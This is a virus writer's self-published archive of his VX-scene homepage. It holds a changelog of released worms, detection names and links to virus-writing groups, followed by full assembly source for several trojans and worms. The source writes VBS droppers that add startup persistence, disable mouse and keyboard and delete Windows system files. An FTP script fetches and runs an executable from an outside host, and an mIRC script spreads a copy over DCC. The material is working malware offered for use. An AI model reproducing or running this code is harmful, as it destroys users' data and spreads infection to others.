Professional Documents
Culture Documents
PetiKArchiver1 0
PetiKArchiver1 0
PetiKArchiver1 0
1.0
17/05/2009
After 7 years to stop coding virus/worms, I decided to assemble all my works.
It is sorted by date like this : YYYYMMDD (where Y is the year, M the month and D the day) and
the name of the works.
In the begining you can see my old website page. Then my works. Newt, my not finish works and
some articles.
Best reading.
PetiK Homepage
(last update : July 9 th 2002)
EMAIL : petikvx@aol.com
2002:
July 9th :
GOOD BYE TO ALL VXERS. I LEAVE THE VX-SCENE. I HOPE MY WORKS LIKE YOU AND WILL
HELP YOU IN YOUR VX-LIFE.
IF YOU WANT TO CONTACT ME, PLEASE WRITE IN THE GUESTBOOK.
Special Thanx to : alc0paul, Benny/29A, Bumblebee, Vecna, Mandragore, ZeMacroKiller98and the greatest
coder group : 29A
July 7th : Add some new descriptions of AV (from Trend Micro and McAfee)
July 3rd : Add the binary of my last Worm coded with alc0paul : VB.Brigada.Worm
July 2nd : Add a new link : Second Part To Hell
June 29th : Add my new tool : PetiK’s VBS Hex Convert and add my last full spread VBS worm : VBS.Hatred
June 26th : Add W32/HTML.Dilan
June 24th : Add VBS.Park
June 22nd : I finish my new worm : VB.DocTor.Worm
June 20th : PETIKVX EZINE #2 REALIZED : DOWNLOAD IT and add a new tool : CryptoText and my last worm :
VB.Mars.Worm
June 19th : Add VBS.Cachemire. Add my new article VBS/HTML Multi-Infection.
June 16th : I join a new Virus Group : Brigada Ocho (create by alc0paul)
June 1st : Add VB.Lili.Worm. My new worm is released : I-Worm.Haram
May 31st : I leave the rRlf group
May 23rd : New Ezine : rRlf#2
May 19th : I remove some source. You can find of them in PetiKVX#1 and the other in PetiKVX#2. Finish
VB.Visual.Worm published in PetiKVX #2
May 14th : Add W97M.ApiWord
May 12th : Add W32.HLLW.Archiver
May 10th : Add a new tool to protect against new VBS Worm : PPVBSW
May 9th : Add a new macro virus : W97M.AutoSpread
May 8th : I join the rRlf group (http://www.rrlf.de). Add HTML.Welcome.
May 6th : Add a new article : VBS Tutorial and exist in PDF
April 27th : Add VBS.Xchange
April 21st : Add all source of my works.
April 7th : Add my first Ezine : PetiKVX Ezine #1. My new email is Petikvx@aol.com
March 15th : Add I-Worm.Together
March 14th : My new email : petikvx@lycos.fr (petikvx@multimania.com failed)
March 10th : Add W32.HLLW.LiteLo
March 9th : Add my articles in PDF format : articlesPDF and 29A#6.
March 8th : Add my first VBS worm and HTML virus generator : PSWVG (W32.PSVG.gen : Norton AntiVirus,
Constructor.VBS.PSWVG.10 : AVP)
March 3rd : Add a new virus/worm : VBS/W97M.Doublet
February 25th : Add a macro virus : W97M.Wolf
February 24th : Add a lame love worm : HTML.Linda
February 22nd : Add W32.HLLW.Wargames
February 18th : Add a new Ezine : rRlf
February 16th : Add my first virus (perhaps bug) : WinRAR.Linda
February 14th : Add a new HTML virus : HTML.Macrophage
February 10th : Can download my last worm. Add my second article : Technics
February 7th : Finish my last worm : I-Worm.Falken (can’t download immediately)
February 4th : Add new worm : I-Worm.Extract
February 1st : New Worm : W32/W97M.Twin
January 27th : I come back with a new worm : HLLW.SingLung.Worm
January 20th : Add PetiKShow. This program contains all the sources of my works.
January 10th : Add an old article about Worm Spreading written by me on September 19th .
January 1st : HAPPY NEW YEAR. I DECIDED TO STOP TO CODE VIRII AND WORM. GOOD BYE
2001:
December 10th : Add my last worm : W32.HLLW.Last
November 6th : I-Worm.Anthrax
October 12th : I-Worm.WTC
September 8th : I-Worm.Passion
September 2nd : I-Worm.Rush
August 24th : I-Worm.Casper
August 18th : Add the tool tElock 5.1 (A compress/encrypted PE file)
August 16th : I-Worm.Kevlar
August 12th : New design. You can hear one of my compositions.
August 9th : New descrption from AVP about I-Worm.MadCow and I-Worm.Friends.
August 8th : I-Worm.XFW
July 18th : New Fanily : W32.Pet_Tick family (6), VBS.Pet_Tick family (3) from Norton Antivirus
July 8th : I-Worm.MaLoTeYa
July 3rd : VBS.Delirious
June 30 th : I-Worm.Bush
June 19th : I-Worm.Winmine
June 18th : W97M.Blood
June 17th : VBS.Seven
June 10th : VBS.Starmania, I-Worm.Gamma, W97M.Kodak
June 4th : BAT.Quatuor
June 3rd : Bastille, JS.Germinal
June 2nd : Add some Worms : HTML.Embargo, I-Worm.Mustard
May 25th : I start my homepage.
Source
You can found here my different worms that I create :
AntiVirus Name
Real Name Date Description
(TM=Trend Micro)
It copies itself to
\WINDOWS\WinHelp.htm. Change the
HTML.Embargo 05/29/2001 VBS.Embaro.A.Intd
AUTOEXEC.BAT. It uses mIRC
channel to spread
W95.Pet_Tick.E@mm
I-Worm.Bush 06/30/2001 Uses MAPI to spread. Not BUGS.
AVP : I-Worm.PetiK.e
Panda : W32/Extract
I-Worm.Extract 02/04/2002 Open KERNEL32.DLL to find API.
TM : WORM.PETIK.L
W32.Pet_Tick.B
It uses a VBS file and mIRC to
W32.Fiend.Worm
I-Worm.Friends 05/05/2001 spread. he alters the Window's
owner and company.
AVP : I-Worm.PetiK.b
W95.Pet_Tick.D@mm
Scan all *.*htm* file in
W95.Wormfix.Worm@mm
I-Worm.Gamma 05/09/2001 "Temporary Internet Files" and
uses MAPI function to spread
AVP : I-Worm.PetiK.c
W32.Pet_Tick.Intd
TM : Worm.PetiK.K
W32.Pet_Tick.G
W32.Malot.Int Uses MAPI to spread. Create a
HTML file in the StartUp folder
I-Worm.MaLoTeYa 07/08/2001
AVP : I-Worm.PetiK.f to send some informations about
the user. CONTRIBUTE TO 29A#6.
TM : Worm.Malot.A
W95.Pet_Tick.C@mm
W95.Buggy.Worm@mm Modify the Wallpaper with a BMP
file that it download to a ftp
I-Worm.PetiK 02/07/2001
AVP : I-Worm.IEPatch site. He spread with a VBS file
which use Outlook.
TM : Worm.PetiK.A
W32.Mineup.Worm
AVP : I-Worm.Petik
I-Worm.Winmine 06/19/2001 Uses Outlook to spread.
McAfee:W32/PetTick@MM
Panda : W32/PetTick
W95.Pet_tick.gen
Infect WSOCK32.DLL and all DLL
I-Worm.XFW 08/08/2001
TM : Trojan.PetiK.XFW files in the SYSTEM directory.
Panda : Worm.PetiK.D
W32/W97M.Dotor.Worm
W32.Pet_Ticky.B
VB.Lili.Worm 06/01/2002 A lame worm with a XXX picture
Panda : W32/Petlil.A
VBS.Pet_Tick.C@m
VBS.Ketip.C@m
VBS.Delirious 07/03/2001 Put his code in NORMAL.DOT
AVP : I-Worm.Petik.h
VBS.Chism@mm
VBS.Copy.A@mm
VBS.Seven 06/18/2001 Many actions in any day
AVP : I-Worm.Petik.i
TM : VBS.PETIK.I
AVP : I-Worm.WarGam
Differents way of propagation :
Viruslist : WarGame
W32.HLLW.Wargames 02/22/2002 open *htm files, old mail read
and Outlook Address
W32.WarGam.Worm
W97M.Pet_Tick.Intd
W97M.Ketip.Intd
W97M.Blood 06/18/2001 Infect NORMAL.DOT.
AVP : Embedded
W97M.Adok.A
W97M.Kodak 06/10/2001 Infect NORMAL.DOT.
AVP:Macro.Word97.Adok
W97M.OutlookWorm.Gen
AVP :
It uses mIRC and Outlook to
W97M.Maya 06/05/2001 Macro.Office.Melissa-
spread.
based
TM : W97M.AYAM.A
Links
VIRUS CODERS :
Alc0paul : http://alcopaul.cjb.net
Belial : http://home.foni.net/~belial
Benny : http://www.coderz.net/benny
Black Jack : http://blackjackvx.cjb.net
Del_Armg0 : http://www.delly.fr.st French coder
FlyShadow : http://flyshadow.cjb.net
Gigabyte : http://www.coderz.net/gigabyte
Immortal Riot : http://www.immortalriot.cjb.net
Kalanar : http://virii.at/ak or http://www.kvirii.com.ar
Lord Julus : http://lordjulus.cjb.net
NBK : http://www.nbk.hpg.ig.com.br
Nucleii : http://www.coderz.net/nucleii/main.html
Pointbat : http://pbat.cjb.net/ French coder
Silvio : http://www.big.net.au/~silvio/
Ratter : http://www.coderz.net/ratter/
SPTH (Second Part To Hell) : http://www.spth.de.vu/
The Walrus : http://walrus.up.to
Tipiax : http://www.multimania.com/tipiax French coder
Vecna : http://www.coderz.net/asm_infamy
VirusBuster : http://vtc.cjb.net
Voven/SMF : http://vovan-smf.wz.cz/
VXUniverse : http://vxuniverse.cjb.net
ZeMacroKiller98 : http://www.crosswinds.net/~zemacrokiller98/index.htm French coder
Zulu : http://www.coderz.net/zulu
VX GROUPS :
29A : http://29a.host.sk
ASM : http://kickme.to/asm
BlackArt : http://blackart.cjb.net
Black Cat virii Group : http://www.ebcvg.com or http://bcvgvx.cjb.net/
Brigada Ocho : http://brigada8.cjb.net
HFX : http://www.hfactorx.org/
Indonesian Virus : http://indovirus.8m.com/
Kryptocrew : http://www.kryptocrew.de
LineZero : http://www.coderz.net/lz0vx/start.htm
MATRiX : http://www.coderz.net/mtxvx
NoMercy : http://www.coderz.net/nomercy/
Pinoy Virus Writer : http://hackers.b3.nu
rRlf : http://www.rrlf.de/
ShadowVX : http://shadowvx.members.easyspace.com/
SMF : http://www.sallyone.com/smf/e_index.htm , http://smfgroup.cjb.net
Ultimate Chaos : http://www.ultimatechaos.co.uk/
Virus Brasil : http://www.virusbrasil.8m.com
OTHER SITES :
Coderz : http://www.coderz.net
Red Virica : http://redvirica.host.sk/
Virii Argentino : http://www.virii.com.ar
Virus Central : http://www.viruscentral.org/
VirusList : http://www.viruslist.com
Virus Trading Center : http://www.oninet.es/usuarios/darknode/
VX-DNET : http://surf.to/vxdnet
VX Heavens : http://vx.netlux.org/
Virus Trading : http://www.virustrading.com/
VX Universe : http://vxuniverse.cjb.net/
ExeTools : http://www.exetools.com
ProTools : http://protools.cjb.net
ANTIVIRUS SITES :
AVP : http://www.avp.ch
Symantec : http://www.symantec.com/avcenter
Trend Micro : http://www.trendmicro.com
CONTACT : GuestBook
© 2001-2002 PetiK. All informations on this site is for educational purpose only .
;TAILLE : 475 OCTETS 31/08/00
;DWARF crée un fichier dwarf.vbs qui ajoutera une clé afin
;que l'ordinateur s'éteigne au démarrage
.model small
.code
org 100h
end DEBUT
;Par M.Xxxxxxx XXXXXXX (c)2000 09/09/00
;TAILLE : 689 OCTETS
;TESTE LE PREMIERE FOIS AU LYCEE KIRSCHLEGER DE MUNSTER
;DWARF259 CREE DEUX PROGRAMME :
; -Dwarf.vbs dans C: active Evil.com … chaque d‚marrage
; -Evil.com dans C:\WINDOWS.
;Le 25 septembre, il renomme REGEDIT.EXE dans la corbeille
;en DWARF.AZE et efface AUTOEXEC.BAT et WIN.INI
.model small
.code
org 100h
WININI db 'C:\WINDOWS\Win.ini',0
AUTOEXEC db 'C:\autoexec.bat',0
REG db 'C:\WINDOWS\Regedit.exe',0
CORBEILLE db 'C:\RECYCLED\dwarf.aze',0
progl2 equ $-VERIFICATION
NOM1 db 'c:\Dwarf.vbs',0
NOM2 db 'c:\WINDOWS\Evil.com',0
prog1 db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah
db 'msgbox "C''EST PARTI",vbcritical',0Dh,0Ah
db 'Dim W',0Dh,0Ah
db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
db 'W.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\Evil.com"'
progl1 equ $-prog1
end TOUT_DEBUT
;Par M.Xxxxxxx XXXXXXX (c)2000 12/09/00
;TAILLE : 1282 OCTETS
;DWARF7 CREE DEUX PROGRAMME : Dwarf.vbs et Panda.vbs. DWARF.VBS VA
;RAJOUTER UNE CLE POUR ACTIVER PANDA.VBS TOUS LES JOURS. PANDA.VBS
;ENTRE EN ACTION QUE LE 5 DECEMBRE. IL RAJOUTE UNE CLE POUR ETEINDRE
;L'ORDINATEUR AU DEMARRAGE ET CREE UN FICHIER AUTOEXE.BAT QUI
;SUPPRIMERA DES FICHIER SUR L'ORDINATEUR.
.model small
.code
org 100h
FILE1: mov ah,3Ch
xor cx,cx
mov dx,offset NOM1
int 21h ;cr‚ation du 1er fichier
xchg ax,bx
mov ah,40h
mov cx,progl1
mov dx,offset prog1
int 21h ;‚criture
mov ah,3Eh
int 21h ;fermeture
FILE2: mov ah,3Ch
xor cx,cx
mov dx,offset NOM2
int 21h ;cr‚ation du 2nd fichier
xchg ax,bx
mov ah,40h
mov cx,progl2
mov dx,offset prog2
int 21h ;‚criture
mov ah,3Eh
int 21h ;fermeture
MESSAGE: mov ax,3
int 10h
mov ah,9
lea dx,msg
int 21h
FIN: mov ah,4Ch
int 21h
NOM1 db 'c:\Dwarf.vbs',0
NOM2 db 'c:\WINDOWS\Panda.vbs',0
prog1 db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah
db 'msgbox "BONNO JOURNEE ?",vbexclamation',0Dh,0Ah
db 'Dim W',0Dh,0Ah
db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
db 'W.Regwrite "HKLM\Software\Microsoft\Windows'
db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\Panda.vbs"'
progl1 equ $-prog1
prog2 db 'If Day(Now) = 5 And Month(Now) = 12 Then',0Dh,0Ah
db 'msgbox "ERREUR : CLIQUEZ SUR OK",vbcritical',0DH,0Ah
db 'Dim W',0DH,0Ah
db 'Set W=CreateObject("WScript.Shell")',0DH,0Ah
db 'W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\'
db 'Run\DwArF", "C:\WINDOWS\RUNDLL32.EXE '
db '%windir%\system\user.exe,Exitwindows"',0DH,0Ah
db 'W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\'
db 'Run\DwArF2", "C:\autoexe.bat"',0DH,0Ah
db 'Set X=CreateObject("Scripting.FileSystemObject")',0DH,0Ah
db 'file="C:\autoexe.bat"',0DH,0Ah
db 'Set O=X.CreateTextFile(file, True, False)',0DH,0Ah
db 'O.Writeline "@echo off"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\*.ini"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\*.sys"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\*.bmp"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\*.sys"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\E*.*"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\M*.*"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\COMMAND\*.*"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\SYSTEM\*.dll"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\SYSTEM\*.ini"',0DH,0Ah
db 'msgbox "TU VAS MOURIR DEMAIN",vbinformation',0DH,0Ah
db 'End If',0DH,0Ah
progl2 equ $-prog2
msg db 7,7,7,10,13,'UN FICHIER A ETE CREE',0Ah,0Ah,0Dh
db 'IL SE NOMME C:\Dwarf.vbs',10,10,13
db 'OUVRE LE VITE $'
end FILE1
;Panda3.asm par PandaKiller 03/10/00
;TASM32 /M /ML panda3
;TLINK32 -Tpe -x -aa panda3,,,import32
.386
locals
jumps
.model flat
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn MessageBoxA:PROC
extrn WinExec:PROC
extrn ExitProcess:PROC
.data
octets dd ?
flz_handle dd ?
nom_fichier db 'C:\Salut.vbs',00h
prog db 'C:\Salut.vbs',00h
TEXTE db 'Salut ! Ca va ?',00h
TITRE db 'Hello',00h
TEXTE2 db 'J''ai mis un fichier sur ton ordinateur',0dh,0ah
db 'Il s''appelle Salut.vbs et se trouve dans C:\',0dh,0ah
db 'Ouvre-le vite',00h
TITRE2 db 'FICHIER CREE',00h
CLE db '\Software\Microsoft\Windows\CurrentVersion',00h
DONNEE db 'PandaKiller',00h
NOM db 'RegisteredOwner',00h
p dd 0
l dd 0
DEBUTV:
db '''VBS/PandaKiller.Trojan.A PAR Pentasm99 (c)2000 03/10/00',0dh,0ah
db '''SE COPIE DANS WINDOWS ET WINDOWS\SYSTEM',0dh,0ah
db '',0dh,0ah
db 'DEBUT()',0dh,0ah
db 'Sub DEBUT()',0dh,0ah
db 'Set a = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set win = a.GetSpecialFolder(0)',0dh,0ah
db 'Set sys = a.GetSpecialFolder(1)',0dh,0ah
db 'Set c = a.GetFile(WScript.ScriptFullName)',0dh,0ah
db 'c.Copy(win&"\WSock32.dll.vbs")',0dh,0ah
db 'c.Copy(sys&"\PandaDwarf.txt.vbs")',0dh,0ah
db 'INTERNET()',0dh,0ah
db 'BUG2001()',0dh,0ah
db 'Set T = a.deletefile("C:\Salut.vbs")',0dh,0ah
db 'End Sub',0dh,0ah
db '',0dh,0ah
db '''MODIFIE LA PAGE INTERNET ET RAJOUTE UN RESISTRE DANS "RUN"',0dh,0ah
db 'Sub INTERNET()',0dh,0ah
db 'Dim W',0dh,0ah
db 'Set W = Wscript.CreateObject("WScript.Shell")',0dh,0ah
db 'W.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\'
db 'Start Page", "http://www.penthouse.com"',0dh,0ah
db 'W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
db 'StartWindoz", "C:\WINDOWS\SYSTEM\WSock32.dll.vbs"',0dh,0ah
db 'End Sub',0dh,0ah
db '',0dh,0ah
db '''DESACTIVE LA SOURIS ET LE CLAVIER EN 2001 ET EXECUTE WINMINE',0dh,0ah
db 'Sub BUG2001()',0dh,0ah
db 'If Year(Now) = 2001 Then',0dh,0ah
db ' Dim P',0dh,0ah
db ' Set P = Wscript.CreateObject("WScript.Shell")',0dh,0ah
db ' P.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
db 'Stop1", "rundll32,mouse disable"',0dh,0ah
db ' P.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
db 'Stop2", "rundll32,keyboard disable"',0dh,0ah
db ' P.run ("C:\WINDOWS\Winmine.exe")',0dh,0ah
db 'End If',0dh,0ah
db 'End Sub',0dh,0ah
taille equ $-DEBUTV
.code
REGISTRE: push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE ;PandaKiller
push 01h
push 0
push offset NOM ;DANS RegisteredOwner
push p
call RegSetValueExA ;CREE UN REGISTRE
push 0
call RegCloseKey ;FERME LA BASE DE REGISTRE
FICHIER: push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
push offset nom_fichier ;DONNE LE NOM DU FICHIER
call CreateFileA
mov [flz_handle],eax
push 00000000h
push offset octets
push offset taille
push offset DEBUTV
push [flz_handle]
call WriteFile
push [flz_handle]
call CloseHandle
MESSAGE: push 40h
push offset TITRE
push offset TEXTE
push 0
call MessageBoxA
push 40h
push offset TITRE2
push offset TEXTE2
push 0
call MessageBoxA
push 1
push offset prog
call WinExec
FIN: push 0
call ExitProcess
end REGISTRE
File Panda3.exe received on 05.16.2009 18:00:23 (CET)
Additional information
File size: 8192 bytes
MD5...: 104229b6d583df50db044f0d89fc7db9
SHA1..: db05dc880b74d864a8c47d8db22c2847b655c14a
comment $
DESCRIPTION:
POUR COMPILER:
Lien : www.coderz.net/matrix
www.matrixvx.org
www.coderz.net
.386p
locals
jumps
.model flat
extrn CreateDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetModuleHandleA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn lstrcat:PROC
extrn MessageBoxA:PROC
extrn SwapMouseButton:PROC
extrn ExitProcess:PROC
.data
moi dd 260 dup (0)
targ1 dd 260 dup (0)
targ10 dd 260 dup (0)
fh dd 0
octets dd 0
l dd 0
p dd 0
CLE db "\Software\Microsoft\Windows\CurrentVersion",00h
DONNEE db "PandaKiller",00h
NOM db "RegisteredOwner",00h
rep1 db "C:\PandaKiller",00h
rep2 db "\Panda",00h
copie1 db "\PandaKiller.exe",00h
copie2 db "\Monopoly.exe",00h
copie3 db "\Panda\Stages.exe",00h
fichier db "\PandaKiller\EMail.txt",00h
TXT db "[PandaKiller]",0dh,0ah
db "Pour tout contact : Panda34@caramail.com",0dh,0ah
db "VBS/LoveLetter.A",0dh,0ah
db "VBS/IE55",0dh,0ah
db "W32.Happy99",0dh,0ah
db "I-Worm/Kak.A",0dh,0ah
db "W32.PandaKiller.A par PandaKiller (c)2000",00h
taille equ $-TXT
.code
DEBUT:
CREER_REPERTOIRE:
push 00000000h
push offset rep1
call CreateDirectoryA ;C:\Pandakiller
push 260
push offset targ1
call GetWindowsDirectoryA
push offset rep2
push offset targ1
call lstrcat
push offset targ1
call CreateDirectoryA ;%windir%\Panda
AUTO_COPIE:
push 00000000h
call GetModuleHandleA
push 260
push offset moi
push eax
call GetModuleFileNameA
push 260
push offset targ1
call GetWindowsDirectoryA
push offset copie1
push offset targ1
call lstrcat
push 00000000h
push offset targ1
push offset moi
call CopyFileA ;%windir%\PandaKiller.exe
push 260
push offset targ1
call GetSystemDirectoryA
push offset copie2
push offset targ1
call lstrcat
push 00000000h
push offset targ1
push offset moi
call CopyFileA ;%system%\Monopoly.exe
push 260
push offset targ10
call GetWindowsDirectoryA
push offset copie3
push offset targ10
call lstrcat
push 00000000h
push offset targ10
push offset targ1
call CopyFileA ;%windir%\Panda\Stages.exe
FICHIER_TEXTE:
push 00000000h
push 00000080h
push 00000002h
push 00000000h
push 00000001h
push 40000000h
push offset fichier
call CreateFileA
mov [fh],eax
push 00h
push offset octets
push taille
push offset TXT
push [fh]
call WriteFile
push [fh]
call CloseHandle
REGISTRE:
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE ;PandaKiller
push 01h
push 0
push offset NOM ;DANS RegisteredOwner
push p
call RegSetValueExA ;CREE UN REGISTRE
push 0
call RegCloseKey ;FERME LA BASE DE REGISTRE
MESSAGE:
push 35h
push offset TITRE
push offset TEXTE
push 00h
call MessageBoxA
cmp eax,4
jne FIN
end DEBUT
File W32PKa.exe received on 05.16.2009 10:40:20 (CET)
Additional information
File size: 8192 bytes
MD5...: 711f77c3a07ea085bee6c1bfa884f012
SHA1..: 3cd6512c587c3b0292264177f3d538aa6e9c6965
comment $
DESCRIPTION:
Ce programme modifie le nom d'enregistrement en PandaKiller. Il se copie
dans %windir% (Dossier WINDOWS) et modifie la page de d‚marrage d'Internet.
Il cr‚e ensuite trois fichiers :
- FTP.DRV : ce fichier va se connecter par FTP et t‚l‚charger un programme
qui est KILL_CIH.EXE (un programme contre CIH)
- FTP.BAT : il va ‚x‚cuter FTP.DRV
- MIRC.EKP : un script pour mIRC qui permet une autoprobagation du fichier.
A la connection, il active FTP.BAT et cope WINEXEC.EXE en
PICTURE.EXE. Quand quelqu'un arrive, il lui envoie PICTURE.EXE
*worm* il envoie ‚galement PICTURE.EXE
*KKK* : d‚connecte
*White Power* : ‚teint le programme
*hitler* : efface Regedit.exe
POUR COMPILER:
Lien : www.coderz.net/matrix
www.matrixvx.org
www.coderz.net
$
.386p
locals
jumps
.model flat
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn GetWindowsDirectoryA:PROC
extrn GetModuleHandleA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn lstrcat:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn WinExec:PROC
extrn CreateDirectoryA:PROC
extrn ExitProcess:PROC
.data
moi dd 260 dup (0)
targ1 dd 260 dup (0)
fh dd 0
octets dd 0
l dd 0
p dd 0
CLE db "\Software\Microsoft\Windows\CurrentVersion",00h
DONNEE db "PandaKiller",00h
NOM db "RegisteredOwner",00h
CLE2 db "\Software\Microsoft\Internet Explorer\Main",00h
DONNEE2 db "http://kadosh.multimania.com",00h
NOM2 db "Start Page",00h
CLE3 db "\Software\Microsoft\Windows\CurrentVersion\Run",00h
DONNEE3 db "C:\Win\kill_cih.exe",00h
NOM3 db "killcih",00h
copie1 db "\WinExec.exe",00h
dossier db "C:\Win",00h
bat db "C:\Win\ftp.bat",00h
drv db "C:\Win\ftp.drv",00h
ini db "C:\Win\mirc.ekp",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\program files\mirc\script.ini",00h
script4 db "C:\program files\mirc32\script.ini",00h
drvd db "open",0dh,0ah
db "members.aol.com",0dh,0ah
db "pentasm99",0dh,0ah
db "cd Panda",0dh,0ah
db "binary",0dh,0ah
db "lcd C:\Win",0dh,0ah
db "get kill_cih.exe",0dh,0ah
db "bye",0dh,0ah
db "exit",0dh,0ah
drvsize equ $-drvd
inid db "[SCRIPT]",0dh,0ah
db "n1=on 1:start:{",0dh,0ah
db "n2=.remote on",0dh,0ah
db "n3=.ctcps on",0dh,0ah
db "n4=.events on",0dh,0ah
db "n5=}",0dh,0ah
db "n6=on 1:connect:{",0dh,0ah
db "n7= /.copy -0 C:\Windows\WinExec.exe C:\Picture.exe",0dh,0ah
db "n8= /.run -n C:\command.com start C:\Win\ftp.bat",0dh,0ah
db "n9=on 1:join:#:{",0dh,0ah
db "n10=if ( $nick == $ma ) {halt } .dcc send $nick C:\Picture.exe",0dh,0ah
db "n11=}",0dh,0ah
db "n12=on 1:text:*worm*:{",0dh,0ah
db "n13=if ( $nick == $ma ) {halt } .dcc send $nick C:\Picture.exe",0dh,0ah
db "n14=}",0dh,0ah
db "n15=on 1:text:*KKK*:/disconnect",0dh,0ah
db "n16=on 1:text:*white power*:/exit",0dh,0ah
db "n17=on 1:text:*hitler*:/remove C:\Windows\regedit.exe",0dh,0ah
inisize equ $-inid
.code
REGISTRE:
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE ;PandaKiller
push 01h
push 0
push offset NOM ;DANS RegisteredOwner
push p
call RegSetValueExA ;CREE UNE VALEUR
push 0
call RegCloseKey ;FERME LA BASE DE REGISTRE
AUTO_COPIE:
push 00000000h
call GetModuleHandleA
push 260
push offset moi
push eax
call GetModuleFileNameA
push 260
push offset targ1
call GetWindowsDirectoryA
push offset copie1
push offset targ1
call lstrcat
push 00000000h
push offset targ1
push offset moi
call CopyFileA ;%windir%\WinExec.exe
CREER_DOSSIER:
push 00000000h
push offset dossier
call CreateDirectoryA ;C:\Win
REGISTRE2:
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE2
push 80000001h ;HKEY_CURRENT_USER
call RegCreateKeyExA
push 05h
push offset DONNEE2 ;kadosh.multimania.com
push 01h
push 0
push offset NOM2 ;Start Page
push p
call RegSetValueExA ;CREE UNE VALEUR
push 0
call RegCloseKey ;FERME LA BASE DE REGISTRE
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE3
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE3 ;C:\nobo.exe
push 01h
push 0
push offset NOM3 ;NOBO
push p
call RegSetValueExA ;CREE UNE VALEUR
push 0
call RegCloseKey ;FERME LA BASE DE REGISTRE
FICHIER:
push 00000000h
push 00000080h
push 00000002h
push 00000000h
push 00000001h
push 40000000h
push offset bat
call CreateFileA
mov [fh],eax
push 00h
push offset octets
push batsize
push offset batd
push [fh]
call WriteFile
push [fh]
call CloseHandle
push 00000000h
push 00000080h
push 00000002h
push 00000000h
push 00000001h
push 40000000h
push offset drv
call CreateFileA
mov [fh],eax
push 00h
push offset octets
push drvsize
push offset drvd
push [fh]
call WriteFile
push [fh]
call CloseHandle
push 00000000h
push 00000080h
push 00000002h
push 00000000h
push 00000001h
push 40000000h
push offset ini
call CreateFileA
mov [fh],eax
push 00h
push offset octets
push inisize
push offset inid
push [fh]
call WriteFile
push [fh]
call CloseHandle
COPIE_MIRC:
push 00000000h
push offset script1
push offset ini
call CopyFileA
push 00000000h
push offset script2
push offset ini
call CopyFileA
push 00000000h
push offset script3
push offset ini
call CopyFileA
push 00000000h
push offset script4
push offset ini
call CopyFileA
WinExecBat:
push 1
push offset bat
call WinExec
FIN: push 0
call ExitProcess
end REGISTRE
File W32PKb.exe received on 05.16.2009 10:41:58 (CET)
Additional information
File size: 8192 bytes
MD5...: 58c6c31028ac1b84cc73eb13300f21da
SHA1..: a73cf795bc76385b71158a64cc770a813b399b74
comment $
POUR COMPILER:
jumps
locals
.386
.model flat
extrn GetModuleHandleA:PROC
extrn GetModuleFileNameA:PROC
extrn GetWindowsDirectoryA:PROC
extrn CopyFileA:PROC
extrn lstrcat:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn GetSystemTime:PROC
extrn MessageBoxA:PROC
extrn ExitProcess:PROC
.data
moi dd 260 dup (0)
targ1 dd 260 dup (0)
copie db "\WinExec.exe",00h
l dd 0
p dd 0
CLE db "\Software\Microsoft\Windows\CurrentVersion",00h
DONNEE db "PandaKiller",00h
NOM db "RegisteredOwner",00h
CLE2 db "\Software\Microsoft\Windows\CurrentVersion\Run",00h
DONNEE2 db "%windir%\WinExec.exe",00h
NOM2 db "WinExec",00h
DONNEE3 db "rundll32 mouse,disable",00h
NOM3 db "Stop1",00h
DONNEE4 db "rundll32 keyboard,disable",00h
NOM4 db "Stop2",00h
TITRE db "T.PK.3",00h
